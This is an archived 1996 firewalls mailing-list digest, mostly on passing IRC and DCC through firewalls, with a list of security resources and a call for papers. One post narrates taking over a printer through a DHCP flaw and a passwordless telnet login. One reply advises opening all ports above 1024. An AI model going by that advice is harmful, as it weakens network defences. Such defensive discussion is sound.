SMTP id QAA15535; Sun, 7 Jul 1996 16:40:06 -0500 (CDT) Received: from web.nmti.com(198.178.0.201) by fw.nmti.com via smap (V1.3) Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id QAA03725; Sun, 7 Jul 1996 16:32:12 -0500 Received: by sonic.nmti.com; id AA06761; Sun, 7 Jul 1996 16:32:11 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9607072132.AA06761@sonic.nmti.com.nmti.com> Subject: Re: IRC and Firewalls To: gordy@nytimes.com (Gordy Thompson) Date: Sun, 7 Jul 1996 16:32:11 -0500 (CDT) Cc: peter@baileynm.com, mazzoni@infogroup.iunet.it, firewalls@GreatCircle.COM In-Reply-To: from "Gordy Thompson" at Jul 7, 96 05:15:39 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Do you think you could elaborate on this just a bit? In > particular, assuming that there is a desire to relay IRC through a > firewall (and without arguing the validity of that desire, for the moment > at least), is there any approach that could be taken to reduce this risk, > short of just not allowing it at all? First of all, DCC can be from any port to any port. It's a point-to-point connection between clients bypassing the IRC network completely, so you'd have to write a proxy that grokked the protocol and pretended to be the client, like the FTP proxies do, and ran on the firewall... or open up a huge range of ports. Second, it's way open to "social engineering" attacks. That's as big a problem as the technical one. From firewalls-owner Sun Jul 7 15:19:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA07402 for firewalls-outgoing; Sun, 7 Jul 1996 15:07:49 -0700 (PDT) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id PAA07373 for ; Sun, 7 Jul 1996 15:07:40 -0700 (PDT) Message-Id: <199607072207.PAA07373@miles.greatcircle.com> Received: by cheops.anu.edu.au From: Darren Reed Subject: Re: IRC and Firewalls To: mazzoni@infogroup.iunet.it (Iacopo Mazzoni) Date: Mon, 8 Jul 1996 08:04:49 +1000 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <1.5.4.32.19960707160658.00665988@infogroup.it> from "Iacopo Mazzoni" at Jul 7, 96 06:06:58 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Iacopo Mazzoni, sie said: > > > Hi all. > > I need your help. > > I use for IRC the program MIRC 4.0 32 bit for Windows 95. > > My provider have installed on server a firewall. > > In the beginning my MIRC was not ok with firewall, so , my provider have > ability port 6667 in firewall and now my MIRC is ok, > but my DCC commands (send and chat) are not ok because firewall cut this > commands. > > What must my provider ability in firewall for the good function of DCC > commands ? Allowing DCC to work requires that any TCP connections be able to connect from outside to inside or inside to outside. i.e. almost no point in having a firewall. The most reliable way is to use a proxy which can also initiate proxies for DCC connections when it recognises them being setup. From firewalls-owner Sun Jul 7 16:05:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA12693 for firewalls-outgoing; Sun, 7 Jul 1996 15:50:06 -0700 (PDT) Received: from sapa.inka.de (sapa.inka.de [193.197.84.6]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id PAA12681 for ; Sun, 7 Jul 1996 15:49:58 -0700 (PDT) Received: from uu.inka.de (root@[193.197.84.8]) by sapa.inka.de Received: from lina (ecki@lina.inka.de) by uu.inka.de Received: by lina Message-Id: From: ecki@lina.inka.de (Bernd Eckenfels) Subject: Re: IRC and Firewalls To: firewalls@GreatCircle.COM Date: Mon, 8 Jul 1996 00:45:54 +0200 (MET DST) In-Reply-To: from "Gordy Thompson" at Jul 7, 96 05:15:39 pm X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, > Do you think you could elaborate on this just a bit? In > particular, assuming that there is a desire to relay IRC through a > firewall (and without arguing the validity of that desire, for the moment > at least), is there any approach that could be taken to reduce this risk, > short of just not allowing it at all? Yes, you could use SOCKsiefied Clients or inteligent firewalls which will dynamically open Ports for DCC by understanding the CTCP Request to open a Connection. (Linux ip_masquerade seems to have IRC Support). This is the same problem as with FTP. You might be able to use outgoing dcc in some conditions, though. Greetings Bernd From firewalls-owner Sun Jul 7 23:19:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA28912 for firewalls-outgoing; Sun, 7 Jul 1996 23:17:49 -0700 (PDT) Received: from gatekeeper.nytimes.com (gatekeeper.nytimes.com [199.181.175.201]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id XAA28905 for ; Sun, 7 Jul 1996 23:17:42 -0700 (PDT) Received: from mailgate.nytimes.com by gatekeeper.nytimes.com; (5.65/1.1.8.2/30Mar95-0352PM) Received: from localhost by mailgate.nytimes.com; (5.65/1.1.8.2/25Jul94-1134AM) Date: Mon, 8 Jul 1996 02:18:50 -0400 (EDT) From: Gordy Thompson To: firewalls@GreatCircle.COM Subject: Re: IRC and Firewalls In-Reply-To: <9607072132.AA06761@sonic.nmti.com.nmti.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sun, 7 Jul 1996, Peter da Silva wrote: > First of all, DCC can be from any port to any port. It's a point-to-point > connection between clients bypassing the IRC network completely, so you'd > have to write a proxy that grokked the protocol and pretended to be the > client, like the FTP proxies do, and ran on the firewall... or open up a > huge range of ports. > > Second, it's way open to "social engineering" attacks. That's as big a > problem as the technical one. Understood, and thanks. Evidently DCC isn't part of "standard IRC" (if there is such a thing). Leaving DCC aside, are there known application-specific vulnerabilities in IRC itself? Assume that the protocol itself can be securely relayed through the firewall (via UDP Relay, perhaps, or a custom-built relay) and leave aside "social engineering" threats like sweet-talking a user into executing a bunch of commands. Are the interior hosts running IRC clients (or even those that aren't) still exposed to risks? Is it possible, for example, to read or alter data on the client host via the IRC connection itself, even if the user is operating the client in a "safe" manner? I know a lot depends on the particular implementation of application software, but we're just beginning to explore this issue and I'm looking for anything I can find out. Are there particular implementations of IRC client s/w that are thought to be especially dangerous to use? Are there any that _aren't?_ -- Gordon T. Thompson gordy@nytimes.com Manager, Internet Services 212-556-1386 The New York Times fax: 212-556-1636 The Times and I have an arrangement: Neither of us speaks for the other. From firewalls-owner Mon Jul 8 00:34:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA02400 for firewalls-outgoing; Mon, 8 Jul 1996 00:28:44 -0700 (PDT) Received: from mail.marben.com (losgatos.marben.com [206.86.34.51]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id AAA02386 for ; Mon, 8 Jul 1996 00:28:37 -0700 (PDT) Received: (from girsch@localhost) From: girsch@marben.com (Arnaud Girsch) Message-Id: <199607080726.AAA28540@mail.marben.com> Subject: Re: IRC and Firewalls To: gordy@nytimes.com (Gordy Thompson) Date: Mon, 8 Jul 1996 00:26:02 -0700 (PDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Gordy Thompson" at Jul 8, 96 02:18:50 am X-Organization: Marben Products, Inc. X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Understood, and thanks. Evidently DCC isn't part of "standard IRC" > (if there is such a thing). See RFC 1459 : "Internet Relay Chat Protocol - J. Oikarinen/D. Reed - May 1993" Arnaud. -- Arnaud Girsch -+- agirsch@marben.com -+- Marben Products, Inc. - San Jose, CA From firewalls-owner Mon Jul 8 00:49:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA01921 for firewalls-outgoing; Mon, 8 Jul 1996 00:21:42 -0700 (PDT) Received: from reference.be (ss5.reference.be [194.111.181.3]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id AAA01907 for ; Mon, 8 Jul 1996 00:21:33 -0700 (PDT) Received: by reference.be (SMI-8.6/SMI-SVR4) Date: Mon, 8 Jul 1996 09:18:02 +0200 (MET DST) From: Kristof Van Damme X-Sender: aeneas@ss5 To: Gordy Thompson cc: firewalls@GreatCircle.COM Subject: Re: IRC and Firewalls In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 8 Jul 1996, Gordy Thompson wrote: > Understood, and thanks. Evidently DCC isn't part of "standard IRC" > (if there is such a thing). Leaving DCC aside, are there known > application-specific vulnerabilities in IRC itself? You never know. I wouldn't risk it on a unix system for instance. It's not impossible that via a bug in, say ircii 2.8, an outsider might be able to run shell commands on the machine behind the firewall and then of course you got a problem (well, actually the whole firewall becomes meaningless then ;-). Anyone knows about any security risks in mirc, virc or ws-irc ? Greetings, Aeneas From firewalls-owner Mon Jul 8 01:34:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA08689 for firewalls-outgoing; Mon, 8 Jul 1996 01:30:16 -0700 (PDT) Received: from mail.marben.com (losgatos.marben.com [206.86.34.51]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id BAA08581 for ; Mon, 8 Jul 1996 01:29:56 -0700 (PDT) Received: (from girsch@localhost) From: girsch@marben.com (Arnaud Girsch) Message-Id: <199607080827.BAA28622@mail.marben.com> Subject: Re: IRC and Firewalls To: aeneas@ss5.reference.be (Kristof Van Damme) Date: Mon, 8 Jul 1996 01:27:12 -0700 (PDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Kristof Van Damme" at Jul 8, 96 09:18:02 am X-Organization: Marben Products, Inc. X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Understood, and thanks. Evidently DCC isn't part of "standard IRC" > > (if there is such a thing). Leaving DCC aside, are there known > > application-specific vulnerabilities in IRC itself? > You never know. I wouldn't risk it on a unix system for instance. It's not > impossible that via a bug in, say ircii 2.8, an outsider might be able to run > shell commands on the machine behind the firewall and then of course you got > a problem (well, actually the whole firewall becomes meaningless then > ;-). The most spreaded bug in ircII is a *human*. I mean .. someone using IRC, someone else tells him to grab some script of some sort, load it. 80% of the users do it. This script can be nothing, but it can also be something that grab some file on the system, and send it thru e-mail. Or many many other things. Arnaud. -- Arnaud Girsch -+- agirsch@marben.com -+- Marben Products, Inc. - San Jose, CA From firewalls-owner Mon Jul 8 04:19:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA15424 for firewalls-outgoing; Mon, 8 Jul 1996 04:09:06 -0700 (PDT) Received: from amsterdam.holding.pi.net (amsterdam.holding.pi.net [145.220.65.41]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id EAA15416 for ; Mon, 8 Jul 1996 04:08:56 -0700 (PDT) Received: from localhost (niels@localhost) by amsterdam.holding.pi.net (8.6.13/8.6.12) with SMTP id MAA03081; Mon, 8 Jul 1996 12:49:45 +0200 Date: Mon, 8 Jul 1996 12:49:45 +0200 (MDT) From: Niels To: Iacopo Mazzoni cc: firewalls@GreatCircle.COM Subject: Re: IRC and Firewalls In-Reply-To: <1.5.4.32.19960707160658.00665988@infogroup.it> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sun, 7 Jul 1996, Iacopo Mazzoni wrote: > What must my provider ability in firewall for the good function of DCC > commands ? DCC (Direct Client-to-Client) does not use any assigned port number. It binds to the first free port. So your provider should open all ports above 1024, both incoming and outgoing. Niels ---------------------------------------------------------------------- Planet Internet Holding XXTP Support Engineer I do not speak for my employer - they are perfectly able to do that. From firewalls-owner Mon Jul 8 08:04:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA23693 for firewalls-outgoing; Mon, 8 Jul 1996 07:54:23 -0700 (PDT) Received: from magneto.acquion.com (magneto.acquion.com [206.154.17.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id HAA23685 for ; Mon, 8 Jul 1996 07:54:17 -0700 (PDT) Received: from wolverine.acquion.com ([206.154.17.12]) Message-Id: <2.2.32.19960708145142.006dc0ac@mail.acquion.com> X-Sender: oolid@mail.acquion.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 08 Jul 1996 10:51:42 -0400 To: firewalls@greatcircle.com From: oolid@acqic.org (Joseph L. Moll) Subject: Re: IRC and Firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 12:49 PM 7/8/96 +0200, you wrote: >On Sun, 7 Jul 1996, Iacopo Mazzoni wrote: > >> What must my provider ability in firewall for the good function of DCC >> commands ? > >DCC (Direct Client-to-Client) does not use any assigned port number. >It binds to the first free port. So your provider should open all ports >above 1024, both incoming and outgoing. > Actually... This is what happens. It is not what you would expect. Two machines: IRC-A with nic-a and IRC-B with nic-b. Both machines are connected to IRC servers (not necessarily the same one, BTW), which logs the IRC nic and IP address of the client. For example: nic-a initiates a DCC call to nic-b. To accomplish this, nic-a tells the IRC server that it wants to initiate the session to nic-b. The IRC server then uses it's already established connection to IRC-B and tells nic-b that nic-a wants to initiate a session, then IRC-B initiates the CONNECTION to IRC-A. Catch the triangle forming here? A ----> Server -----> B A ----> Server A -----> Server B ----> B ^ | or ^ | +--<----<----<----<---+ +---<----<----<----<----<----<----<----+ This is the worst possible case WRT security because this allows a type of "highjacking" or "trusted host spoofing" built right in to the protocol. If you allow IRC clients to talk to IRC servers, and allow those same clients to initiate outgoing TCP connections, you are breeched. In this case, however, IRC-B will not be able to complete the initiation of a session with IRC-A since IRC-A will be attempting to initiate a connection to a machine behind your firewall. In short, a machine outside your firewall can cause a machine inside your firewall to contact it as long as it is connected to the IRC server via the DCC connection protocol. Once connected via DCC, files can be exchanged, etc. --- Joseph L. (Joe) Moll, Greenville, SC USA mailto:oolid@acqic.org From firewalls-owner Mon Jul 8 08:37:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA24640 for firewalls-outgoing; Mon, 8 Jul 1996 08:19:56 -0700 (PDT) Received: from ACML.COM ([206.218.249.66]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA24620 for ; Mon, 8 Jul 1996 08:19:46 -0700 (PDT) Received: from smtpngw.acml.com by ACML.COM (SMI-8.6/SMI-SVR4) Received: by smtpngw.acml.com (IBM OS/2 SENDMAIL VERSION 1.3.14/2.12um) id AA1757; Mon, 08 Jul 96 11:17:25 -0400 Message-Id: <9607081517.AA1757@smtpngw.acml.com> Received: from ACML with "Lotus Notes Mail Gateway for SMTP" id To: Firewalls-Digest Cc: firewalls-digest From: Rey.LeClerc/New.York/ACMC Date: 8 Jul 96 11:16:43 Subject: Re: Firewalls-Digest V5 #407 X-Lotus-Type: Reply to _All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The following are interesting Security Internet sites: Telnet Access to Internet Sites gopher csrc.ncsl.nist.gov (NIST BBS - security bulletins & numerous security audit references) Useful WWW Servers http://www.alw.nih.gov/~jbk/security.html (UNIX security information) http://crimelab.com/bugtraq/bugtraq.html (UNIX/Bugtraq archive) http://www.cs.purdue.edu (extensive security archive/mirror site) http://csrc.ncsl.nist.gov (NIST Information Security Clearning House) http://ww01.dhmc.dartmount.edu (Dartmount Internal Audit BBS) http://www.openmarket.com/info/internet-index/current.html (Internet Facts) http://www.dct.ac.uk/www/books/hacker-crackdown/hacker.html (Hacker Crackdown book) http://www-ns.rutgers.edu/www-security/reference.html (Rutgers WWW Security Reference page) http://www.tansu.com.au/Info/security.html (security reference index) http://www.spy.org (spy BBS) http://www.uhsa.uh.edu/issa FTP Sites csrc.ncsl.nist.gov (NIST security FTP server) decuac.dec.com (routers, firewalls and UNIX tools) ftp.cisco.com (routers and firewalls) ftp.eff.org (Computer Underground Digest) ftp.greatcircle.com (firewalls) ftp.sunet.se (numerous UNIX & TCP/IP security resources) ftp.sura.net (numerous UNIX & TCP/IP security resources) ftp.uu.net (numerous UNIX & TCP/IP security resources; USENIX) info.cert.org (security bulletins, checklist, security tools, VIRUS-L) nasirc.nasa.gov (NASA security bulletins) net.tamu.edu (frewalls & UNIX security tools) nisca.asc.ohio-state.edu (firewalls) nist.ncsl.nist.gov (NIST BBS - security bulletins & numerous security/audit references) research.att.com (firewalls) theta.iis.utokyo.ac.jp:/pub1/securiy (security tools and information) thumper.bellcore.com (numerous UNIX & TCP/IP security resources) tis.com (firewalls) ftp.win.tue.nl (numerous UNIX & TCP/IP security tools and references, including SATAN) Security/Audit Related Usenet Groups alt.2600 alt.2600.debate alt.2600.moderated alt.2600.QnA alt.business.internal-audit alt.crackers alt.cyberbunk.alliance alt.hacker alt.hackers alt.hackers.discuss alt.security alt.security.pgp alt.security.ripem alt.sysadm.recovery comp.protocols.kerberos comp.risks comp.security.announce comp.security.misc comp.security.unix comp.unix.admin comp.unix.wizards comp.virus info.pem.dev misc.security phl.2600 sci.scrypt Security Mailing Lists/E-mail Servers 2600@well.sf.ca.us (hacker related information) bugtraq-request@crimelab.com (UNIX security exposures) cert-advisory-request@cert.org (security bulletins) cert-tools-request@cert.org (security tools forum) docserver@csrc.ncsl.nist.gov (NIST document mail server) mailserv@ds.internic.net (primary Internet RFC repository, *****see below*****) majordomo@alive.ampr.ab.ca (subscribe Hack-L: The Hack Report, Hacker alerts) majordomo@GreatCircle.com (firewalls digest) indicate "subscribe firewall_digest" phrack@well.sf.ca.us (hacker related information) risk-request@CSL.SRI.COM (RISKS digest) listserv@lehigh.edu (urgent virus warnings) listserv@lehigh.edu (discussion group on virus) Useful Internet RFCs RFC1038 Draft Revised IP Security Option RFC1108 Security Options for the Internet RFC1244 Site Security Handbook RFC1352 Security Protocols RFC1446 Security Protocols RFC1455 Physical Link Security RFC1535 Security Problems RFC1579 Firewall-Friendly FTP These are just some RFC to give you a flavor. There are many others. To get RFCs send E-Mail to: mailserv@ds.internic.net document-by-name-above RFCXXXX From firewalls-owner Mon Jul 8 08:50:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA26226 for firewalls-outgoing; Mon, 8 Jul 1996 08:46:40 -0700 (PDT) Received: from ftp.com (ftp.com [128.127.2.122]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA26215 for ; Mon, 8 Jul 1996 08:46:31 -0700 (PDT) Received: from ftp.com by ftp.com ; Mon, 8 Jul 1996 11:43:46 -0400 Received: from mailserv-100bs.ftp.com by ftp.com ; Mon, 8 Jul 1996 11:43:46 -0400 Received: by MAILSERV-100BS.FTP.COM (SMI-8.6/SMI-SVR4) Date: Mon, 8 Jul 1996 11:42:34 -0400 Message-Id: <199607081542.LAA23080@MAILSERV-100BS.FTP.COM> To: Russ.Cooper@RC.Toronto.on.ca Subject: RE: Help me (DHCP) Dynamic host configuration protocol From: chip@ftp.com (Chip Sparling) Reply-To: chip@ftp.com Cc: "Firewalls@greatcircle.com" Repository: mailserv-100bs.ftp.com, [message accepted at Mon Jul 8 11:42:25 1996] Originating-Client: slingshot.ftp.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Although I'm not sure what you mean by security level, DHCP is normally >contained to your own segment, so unless your Internet router is forwarding >DHCP broadcasts (or all broadcasts) to the Internet the security risks are >within your site. Not a firewall thing, but a specific dhcp security problem. I exploited a broken Apple dhcp client to completely take over a printer that is now my plaything :-) It is an Apple Laser Writer (LW) 16/600 PS and it took the IP address that I was assigning to another machine with our (ftp software) DHCP server on Windows 95. It seems that if you don't configure IP on the LW, it polls forever with dhcp and then will take any bootp/dhcp response, even if directed at a hardware address other than its own. In this case it grabbed an IP address that I was giving to someone else, then both clients started generating "Duplicate IP address detected" messages. I was tracing all DHCP traffic and thus had the wayward printers hardware address, using the new IP address it grabbed, I telneted to it, logged in (the telnet server had no default password, the first login sets it), printed the configuration page (printed to paper not screen), picked and set a random, but valid IP address and restarted the machine. Then I set about to find the owner of the printer, the telnet login had identified the machine as an Apple, so I set off to find our graphic designers, who happened to be huddled around one of their printers that had magically started printing setup screens and rebooting itself. The final solution was to either have a broken dhcp client forever polling and accepting any responses, or a static ip address, so we now have a machine in our dns called bad-dhcp-client.ftp.com or somesuch. The users only print to it with appletalk, but there is no way to completely turn off the ip protocol (as far as I can tell). chip From firewalls-owner Mon Jul 8 09:49:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA00606 for firewalls-outgoing; Mon, 8 Jul 1996 09:43:05 -0700 (PDT) Received: from sapa.inka.de (sapa.inka.de [193.197.84.6]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA00584 for ; Mon, 8 Jul 1996 09:42:54 -0700 (PDT) Received: from uu.inka.de (root@[193.197.84.8]) by sapa.inka.de Received: from lina (ecki@lina.inka.de) by uu.inka.de Received: by lina Message-Id: From: ecki@lina.inka.de (Bernd Eckenfels) Subject: Re: IRC and Firewalls To: gordy@nytimes.com (Gordy Thompson) Date: Mon, 8 Jul 1996 17:58:50 +0200 (MET DST) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Gordy Thompson" at Jul 8, 96 02:18:50 am X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, > Assume that the protocol itself can be securely relayed through > the firewall (via UDP Relay, perhaps, or a custom-built relay) it's TCP to ports like 6660-66670. > and leave > aside "social engineering" threats like sweet-talking a user into > executing a bunch of commands. Are the interior hosts running IRC clients > (or even those that aren't) still exposed to risks? Yes, there where a few problems in irc clients like buffer overruns. Another problem was dcc get, ppl can send you a bunch of files including a new .rhosts. A much bigger problem is the addiction potential :) > I know a lot depends on the particular implementation of > application software, but we're just beginning to explore this issue and > I'm looking for anything I can find out. Are there particular > implementations of IRC client s/w that are thought to be especially > dangerous to use? Are there any that _aren't?_ I have seen a proxy IRC client which can hide local host and usernames, I will look for the source. It understands the protocol, acts as server to internal clients and acts as client to servers. Greetings Bernd From firewalls-owner Mon Jul 8 10:49:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA04196 for firewalls-outgoing; Mon, 8 Jul 1996 10:37:29 -0700 (PDT) Received: from snmpmgr.state.tn.us (snmpmgr.state.tn.us [170.142.1.74]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA04167 for ; Mon, 8 Jul 1996 10:37:17 -0700 (PDT) Received: from langate.tnet.state.tn.us ([170.142.11.126]) by snmpmgr.state.tn.us with SMTP id AA11050 Received: from tn01-Message_Server by langate.tnet.state.tn.us Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Mon, 08 Jul 1996 12:33:21 -0500 From: "Samuel T. Baker" To: firewalls@GreatCircle.COM Subject: Firewall configuration validation Mime-Version: 1.0 Content-Type: text/plain Content-Disposition: inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What tools or practices are appropriate/useful for validating the conformance of a firewall configuration to the stated security policy? Samuel T. Baker Director, Computer Operations 615 532-8026 voice 615 734-6459 fax sbaker@mail.state.tn.us Happy Birthday, Tennessee Celebration of the Centuries, 1796-1996 From firewalls-owner Mon Jul 8 11:04:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA04272 for firewalls-outgoing; Mon, 8 Jul 1996 10:38:28 -0700 (PDT) Received: from toadflax.cs.ucdavis.edu (toadflax.cs.ucdavis.edu [128.120.56.188]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA04247 for ; Mon, 8 Jul 1996 10:38:15 -0700 (PDT) Received: from nob (nob.cs.ucdavis.edu) by toadflax.cs.ucdavis.edu (4.1/UCD.CS.2.6) Received: by nob (5.x/UCDCS.SECLAB.Solaris2-2.0) Date: Mon, 8 Jul 1996 10:35:23 -0700 From: bishop@cs.ucdavis.edu (Matt Bishop) Message-Id: <9607081735.AA28855@nob> To: firewalls@greatcircle.com Subject: [2nd Posting] CFP: Symposium on Network and Distributed System Security Sender: firewalls-owner@GreatCircle.COM Precedence: bulk CALL FOR PAPERS The Internet Society Symposium on Network and Distributed System Security February 10-11, 1997, San Diego Princess Resort, San Diego, California Submissions due: August 1, 1996 Notification to Authors: October 1, 1996 Camera-Ready Copy due: November 1, 1996 GOAL: The symposium will bring together people who are building hardware and software to provide network and distributed system security services. The symposium is intended for those interested in the practical aspects of network and distributed system security, focusing on actual system design and implementation, rather than theory. We hope to foster the exchange of technical information that will encourage and enable the Internet community to apply, deploy, and advance the state of available security technology. Symposium proceedings will be published by the IEEE Computer Society Press. Topics for the symposium include, but are not limited to, the following: * Design and implementation of communication security services: authentication, integrity, confidentiality, authorization, non-repudiation, and availability. * Design and implementation of security mechanisms, services, and APIs to support communication security services, key management and certification infrastructures, audit, and intrusion detection. * Requirements and designs for securing network information resources and tools -- WorldWide Web (WWW), Gopher, archie, and WAIS. * Requirements and designs for systems supporting electronic commerce -- payment services, fee-for-access, EDI, notary -- endorsement, licensing, bonding, and other forms of assurance. * Design and implementation of measures for controlling network communication -- firewalls, packet filters, application gateways, and user/host authentication schemes. * Requirements and designs for telecommunications security especially for emerging technologies -- very large systems like the Internet, high-speed systems like the gigabit testbeds, wireless systems, and personal communication systems. * Special issues and problems in security architecture, such as interplay between security goals and other goals -- efficiency, reliability, interoperability, resource sharing, and cost. * Integration of security services with system and application security facilities, and application protocols -- including but not limited to message handling, file transport, remote file access, directories, time synchronization, data base management, routing, voice and video multicast, network management, boot services, and mobile computing. GENERAL CHAIR: David Balenson, Trusted Information Systems PROGRAM CHAIRS: Clifford Neuman, University of Southern California Matt Bishop, University of California at Davis PROGRAM COMMITTEE: Steve Bellovin, AT&T Research Tom Berson, Anagram Laboratories Doug Engert, Argonne National Laboratory Warwick Ford, Bell Northern Research Richard Graveman, Bellcore Li Gong, SRI Burt Kaliski, RSA Laboratories Steve Kent, BBN Tom Longstaff, CERT Doug Maughan, National Security Agency Dan Nessett, Sun Microsystems Hilarie Orman, DARPA Michael Roe, Cambridge University Christoph Schuba, Purdue University Jonathan Trostle, CyberSafe Theodore Ts'o, Massachusetts Institute of Technology Doug Tygar, Carnegie Mellon University Vijay Varadharajan, University of W. Sydney Roberto Zamparo, Telia Research LOCAL ARRANGEMENTS CHAIR: Thomas Hutton, San Diego Supercomputer Center PUBLICATIONS CHAIR: Steve Welke, Institute for Defense Analyses REGISTRATIONS CHAIR: Donna Leggett, Internet Society SUBMISSIONS: The committee invites technical papers and panel proposals for topics of technical and general interest. Technical papers should be 10-20 pages in length. Panel proposals should be two pages and should describe the topic, identify the panel chair, explain the format of the panel, and list three to four potential panelists. Technical papers will appear in the proceedings. A description of each panel will appear in the proceedings, and may at the discretion of the panel chair, include written position statements from each panelist. Each submission must contain a separate title page with the type of submission (paper or panel), the title or topic, the names of the author(s), organizational affiliation(s), telephone and FAX numbers, postal addresses, Internet electronic mail addresses, and must list a single point of contact if more than one author. The names of authors, affiliations, and other identifying information should appear only on the separate title page. Submissions must be received by 1 August 1996, and should be made via electronic mail in either PostScript or ASCII format. If the committee is unable to print a PostScript submission, it will be returned and hardcopy requested. Therefore, PostScript submissions should arrive well before 1 August. If electronic submission is difficult, submissions should be sent via postal mail. All submissions and program related correspondence (only) should be directed to the program chair: Clifford Neuman, University of Southern California, Information Sciences Institute, 4676 Admiralty Way, Marina del Rey, California 90292-6695, Phone: +1 (310) 822-1511, FAX: +1 (310) 823-6714, Email: sndss97-submissions@isi.edu. Dates, final call for papers, advance program, and registration information will be available at the URL: http://www.isoc.org/conferences/ndss97. Each submission will be acknowledged by e-mail. If acknowledgment is not received within seven days, please contact the program chair as indicated above. Authors and panelists will be notified of acceptance by 1 October 1996. Instructions for preparing camera-ready copy for the proceedings will be sent at that time. The camera-ready copy must be received by 1 November 1996. From firewalls-owner Mon Jul 8 12:05:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA09196 for firewalls-outgoing; Mon, 8 Jul 1996 12:02:13 -0700 (PDT) Received: from ctyme.com (mail.ctyme.com [204.71.97.97]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA09182 for ; Mon, 8 Jul 1996 12:02:06 -0700 (PDT) Received: (from joey@localhost) by ctyme.com (8.6.12/8.6.9) id OAA08415; Mon, 8 Jul 1996 14:00:56 -0500 Date: Mon, 8 Jul 1996 14:00:56 -0500 (CDT) From: Just Dew it! To: firewalls@greatcircle.com Subject: Security Meetings/Symposiums (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I would like to get information on some of the Security Meetings/Symposiums that are open to the general public, or even those that would require certain credentials. Please respond in kind! add filter reply 100 flames/32 bitbucket/32 all From firewalls-owner Mon Jul 8 14:04:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA13707 for firewalls-outgoing; Mon, 8 Jul 1996 13:37:47 -0700 (PDT) Received: from relay-4.mail.demon.net 